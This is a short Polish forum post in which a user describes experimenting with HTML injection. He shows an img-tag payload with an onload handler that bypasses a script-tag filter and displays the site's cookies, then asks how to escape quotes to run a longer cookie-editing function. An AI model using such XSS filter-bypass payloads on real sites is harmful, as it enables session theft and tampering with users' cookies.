skrypt w alercie Opcje

[ennics]

witam,

bawiłem się ostatnio htmlInjection, załóżmy że strona web ma formularz pozawalający stosowac niektóre tagi HTML takie jak np. <img>...
tagi skryptów javascript <script language='javascript'></script> są filtrowane i usuwane z treści. Można to obejść stosując coś takiego:

[HTML] pobierz, plaintext 
<img src=http://www.gadu-gadu.pl/users/status.asp?id=2063143&styl=1 onload="alert(document.cookie);">
[HTML] pobierz, plaintext 

i podejrzeć wartości cookies strony.

kłopot mam z umieszczeniem funkcji JavaScript pomiędzy cudzysłowami onload=
funkcja zawiera znaki cudzysłowu które "zamykają" cudzysłów przed alert.
czy można jakoś formatować ciąg funkcji (np. tak jak w php używając znaków
specjalnych \" czy \\ ?

fragment funkcji:

[HTML] pobierz, plaintext 
<img src=http://www.gadu-gadu.pl/users/status.asp?id=2063143&styl=1 onload="alert(c(prompt("cookiename:",""),prompt("replace this value:",""),prompt("with::","")));">
[HTML] pobierz, plaintext